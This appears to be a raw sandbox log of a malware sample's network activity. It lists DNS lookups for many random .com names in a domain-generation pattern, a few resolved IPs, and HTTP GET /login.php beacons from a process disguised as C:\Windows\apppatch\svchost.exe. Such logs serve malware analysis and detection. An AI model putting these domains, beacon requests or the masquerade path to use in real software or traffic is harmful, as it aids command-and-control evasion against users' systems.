                                                                                                                                                                                                            Nov 11, 2024 18:25:28.488512039 CET1.1.1.1192.168.2.100x1b3eName error (3)qegyfeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.488693953 CET1.1.1.1192.168.2.100xb8ccName error (3)vocyqot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.492635965 CET1.1.1.1192.168.2.100x84a4Name error (3)gatycis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.492695093 CET1.1.1.1192.168.2.100x2075Name error (3)puvywal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.493722916 CET1.1.1.1192.168.2.100xc269Name error (3)vocykec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.495206118 CET1.1.1.1192.168.2.100x871dName error (3)ganyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.496921062 CET1.1.1.1192.168.2.100x675dName error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.497200966 CET1.1.1.1192.168.2.100x7dc6Name error (3)qekyqoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.497924089 CET1.1.1.1192.168.2.100xae52Name error (3)vopydaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.499253035 CET1.1.1.1192.168.2.100x83c1Name error (3)pupydev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.500201941 CET1.1.1.1192.168.2.100x14cdName error (3)puzymup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.502012014 CET1.1.1.1192.168.2.100x49f7Name error (3)gahyfyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.502456903 CET1.1.1.1192.168.2.100x1161Name error (3)qeqylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.513207912 CET1.1.1.1192.168.2.100x5bc3Name error (3)vojygym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.516066074 CET1.1.1.1192.168.2.100xb12fName error (3)qetyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.523575068 CET1.1.1.1192.168.2.100x393eName error (3)lyryxud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.528943062 CET1.1.1.1192.168.2.100x1f53Name error (3)vofydak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.528956890 CET1.1.1.1192.168.2.100x62b1Name error (3)gacykas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.529057980 CET1.1.1.1192.168.2.100xacf7Name error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.529463053 CET1.1.1.1192.168.2.100x8b4bName error (3)pufydaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.529788017 CET1.1.1.1192.168.2.100xaa1Name error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.532248020 CET1.1.1.1192.168.2.100x411cName error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.533488989 CET1.1.1.1192.168.2.100xfacdName error (3)lyryson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.536613941 CET1.1.1.1192.168.2.100xa13aName error (3)lykygun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.537635088 CET1.1.1.1192.168.2.100x2ed2Name error (3)purypig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.542515993 CET1.1.1.1192.168.2.100xc4b0Name error (3)lygyfej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.543349981 CET1.1.1.1192.168.2.100x7afdName error (3)qebylyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.550616026 CET1.1.1.1192.168.2.100x9e66Name error (3)gadydow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.551078081 CET1.1.1.1192.168.2.100xb0faName error (3)gaqyzyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.551337957 CET1.1.1.1192.168.2.100x3524Name error (3)vojymuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.552205086 CET1.1.1.1192.168.2.100x658eName error (3)lyxymix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.554138899 CET1.1.1.1192.168.2.100x1d6fName error (3)qekyhug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.555082083 CET1.1.1.1192.168.2.100x602fName error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.555700064 CET1.1.1.1192.168.2.100xa14bName error (3)vowyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.556190968 CET1.1.1.1192.168.2.100xbad6Name error (3)qetysog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.556269884 CET1.1.1.1192.168.2.100x51f3Name error (3)pupycop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.556411982 CET1.1.1.1192.168.2.100xe114Name error (3)ganyrew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.557317019 CET1.1.1.1192.168.2.100x1b97Name error (3)lykymij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.557563066 CET1.1.1.1192.168.2.100x9114Name error (3)lyvylyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.557590008 CET1.1.1.1192.168.2.100xbbbfName error (3)vopycoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.558739901 CET1.1.1.1192.168.2.100xe2bfName error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.564677000 CET1.1.1.1192.168.2.100x6cb2Name error (3)qegynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.572315931 CET1.1.1.1192.168.2.100x6a69Name error (3)lymytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.573296070 CET1.1.1.1192.168.2.100x92efName error (3)pujygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.573391914 CET1.1.1.1192.168.2.100x33fName error (3)puryxuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.574559927 CET1.1.1.1192.168.2.100xc692Name error (3)gatydab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.577004910 CET1.1.1.1192.168.2.100x50efName error (3)qeqytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.581504107 CET1.1.1.1192.168.2.100x1ed4Name error (3)qexyqip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.594894886 CET1.1.1.1192.168.2.100xffaName error (3)vofybet.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.599929094 CET1.1.1.1192.168.2.100x689eName error (3)puzyjov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.601052999 CET1.1.1.1192.168.2.100x35faName error (3)gacyqoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.604123116 CET1.1.1.1192.168.2.100xe4acName error (3)puvylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.608092070 CET1.1.1.1192.168.2.100xeda6Name error (3)lyvywar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915144920 CET1.1.1.1192.168.2.100x7fb4Name error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921107054 CET1.1.1.1192.168.2.100x3fadName error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.922941923 CET1.1.1.1192.168.2.100xfe1dName error (3)vopyput.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923973083 CET1.1.1.1192.168.2.100xc666Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.925139904 CET1.1.1.1192.168.2.100xeeeaName error (3)vonykam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.925152063 CET1.1.1.1192.168.2.100x2ef4Name error (3)pujybev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.925894976 CET1.1.1.1192.168.2.100xf1e3Name error (3)galynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.926052094 CET1.1.1.1192.168.2.100x5903Name error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.926512003 CET1.1.1.1192.168.2.100xf0dName error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.930674076 CET1.1.1.1192.168.2.100x8569Name error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.931360960 CET1.1.1.1192.168.2.100x33d8Name error (3)qedysol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.932070971 CET1.1.1.1192.168.2.100xe349Name error (3)volymuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.932081938 CET1.1.1.1192.168.2.100x2455Name error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.932725906 CET1.1.1.1192.168.2.100xe84dName error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.933398962 CET1.1.1.1192.168.2.100x369cName error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.933844090 CET1.1.1.1192.168.2.100x888Name error (3)lysysir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.938256979 CET1.1.1.1192.168.2.100xb1feName error (3)qekynyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.939485073 CET1.1.1.1192.168.2.100x44f5Name error (3)qebykoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.945513964 CET1.1.1.1192.168.2.100xa9b2Name error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.946741104 CET1.1.1.1192.168.2.100x6805Name error (3)lyvyjoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.946885109 CET1.1.1.1192.168.2.100xbe20Name error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.948846102 CET1.1.1.1192.168.2.100x4dabName error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.948864937 CET1.1.1.1192.168.2.100xe79cName error (3)lymylen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.952122927 CET1.1.1.1192.168.2.100xc352Name error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.954544067 CET1.1.1.1192.168.2.100x8785Name error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.955492020 CET1.1.1.1192.168.2.100x230bName error (3)lykynyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.957149982 CET1.1.1.1192.168.2.100xcdc4Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.958389044 CET1.1.1.1192.168.2.100xdfc7Name error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.966644049 CET1.1.1.1192.168.2.100xd39cName error (3)pumyleg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.590215921 CET1.1.1.1192.168.2.100x3581Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597549915 CET1.1.1.1192.168.2.100x8d4cName error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597712040 CET1.1.1.1192.168.2.100x6c86Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.603030920 CET1.1.1.1192.168.2.100xb01Name error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.604245901 CET1.1.1.1192.168.2.100xfdf8Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.607948065 CET1.1.1.1192.168.2.100x2918Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.607959986 CET1.1.1.1192.168.2.100x43eeName error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.609925032 CET1.1.1.1192.168.2.100x1aefName error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.611752033 CET1.1.1.1192.168.2.100xe594Name error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.612086058 CET1.1.1.1192.168.2.100xe367Name error (3)pumyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.614172935 CET1.1.1.1192.168.2.100x14e3Name error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.617650986 CET1.1.1.1192.168.2.100xb509Name error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.617661953 CET1.1.1.1192.168.2.100xe545Name error (3)gacyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.622005939 CET1.1.1.1192.168.2.100x7fc1Name error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.623109102 CET1.1.1.1192.168.2.100x3720Name error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.623790979 CET1.1.1.1192.168.2.100xd4c9Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.643531084 CET1.1.1.1192.168.2.100x7ad0Name error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.644695997 CET1.1.1.1192.168.2.100xcb0Name error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.645158052 CET1.1.1.1192.168.2.100xa4e4Name error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.646064997 CET1.1.1.1192.168.2.100x9c51Name error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.667419910 CET1.1.1.1192.168.2.100x3518Name error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.685760021 CET1.1.1.1192.168.2.100x8d4bName error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.687930107 CET1.1.1.1192.168.2.100xece7Name error (3)volyqat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.691601038 CET1.1.1.1192.168.2.100xe078Name error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.694840908 CET1.1.1.1192.168.2.100x5380Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.719017982 CET1.1.1.1192.168.2.100x2cbaName error (3)qeqyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.719042063 CET1.1.1.1192.168.2.100xa155Name error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.723556042 CET1.1.1.1192.168.2.100xa7fdName error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738607883 CET1.1.1.1192.168.2.100xae45Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.744901896 CET1.1.1.1192.168.2.100x64c6Name error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.747473001 CET1.1.1.1192.168.2.100xbb06Name error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.748332024 CET1.1.1.1192.168.2.100x6640Name error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.749437094 CET1.1.1.1192.168.2.100x13ecName error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.763040066 CET1.1.1.1192.168.2.100xe8cdName error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766134977 CET1.1.1.1192.168.2.100x38ffName error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766467094 CET1.1.1.1192.168.2.100x13a1Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766475916 CET1.1.1.1192.168.2.100x955aName error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766984940 CET1.1.1.1192.168.2.100xbcfbName error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.767010927 CET1.1.1.1192.168.2.100x8d68Name error (3)lyxywer.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.768177032 CET1.1.1.1192.168.2.100x4a03Name error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.769891977 CET1.1.1.1192.168.2.100xe941Name error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.783243895 CET1.1.1.1192.168.2.100x9aa2Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784674883 CET1.1.1.1192.168.2.100x171aName error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.790766001 CET1.1.1.1192.168.2.100x3bbaName error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.793289900 CET1.1.1.1192.168.2.100xa900Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.794457912 CET1.1.1.1192.168.2.100xaab0Name error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.798182011 CET1.1.1.1192.168.2.100xc4b3Name error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.807352066 CET1.1.1.1192.168.2.100xaaecName error (3)vonyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.064414978 CET1.1.1.1192.168.2.100x6723Server failure (2)lysyfyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.975531101 CET1.1.1.1192.168.2.100xe840Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.979830027 CET1.1.1.1192.168.2.100x8736Name error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.981245995 CET1.1.1.1192.168.2.100xf36Name error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.996500015 CET1.1.1.1192.168.2.100xd8e5Name error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.999425888 CET1.1.1.1192.168.2.100x45eName error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.023701906 CET1.1.1.1192.168.2.100x9d05Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.024827957 CET1.1.1.1192.168.2.100x818aName error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.027872086 CET1.1.1.1192.168.2.100x8dd2Name error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.043342113 CET1.1.1.1192.168.2.100xd1cdName error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.063186884 CET1.1.1.1192.168.2.100xfb9Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.158220053 CET1.1.1.1192.168.2.100xf4daName error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.190310001 CET1.1.1.1192.168.2.100x52d4Name error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.209796906 CET1.1.1.1192.168.2.100x179Name error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.206984997 CET1.1.1.1192.168.2.100xf23bName error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.210999012 CET1.1.1.1192.168.2.100xf310No error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.210999012 CET1.1.1.1192.168.2.100xf310No error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.220237017 CET1.1.1.1192.168.2.100xf3bcName error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.229105949 CET1.1.1.1192.168.2.100xe866Name error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.234344959 CET1.1.1.1192.168.2.100xe37Name error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.326090097 CET1.1.1.1192.168.2.100x4f50No error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.394615889 CET1.1.1.1192.168.2.100xa6d9No error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.398926020 CET1.1.1.1192.168.2.100x30bcNo error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.429943085 CET1.1.1.1192.168.2.100xd833No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.457834005 CET1.1.1.1192.168.2.100xcb45No error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.457834005 CET1.1.1.1192.168.2.100xcb45No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49723 | 18.208.156.248 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:29.220968962 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
Nov 11, 2024 18:24:29.653403997 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=73fb4c4f51e49a06ee72b15e3b9b9bd0|66.23.206.109|1731345869|1731345869|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49724 | 199.59.243.227 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:29.502866983 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
Nov 11, 2024 18:24:29.924185991 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:24:28 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: 56c592c3-0730-4a19-aac9-be9b7f376588
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
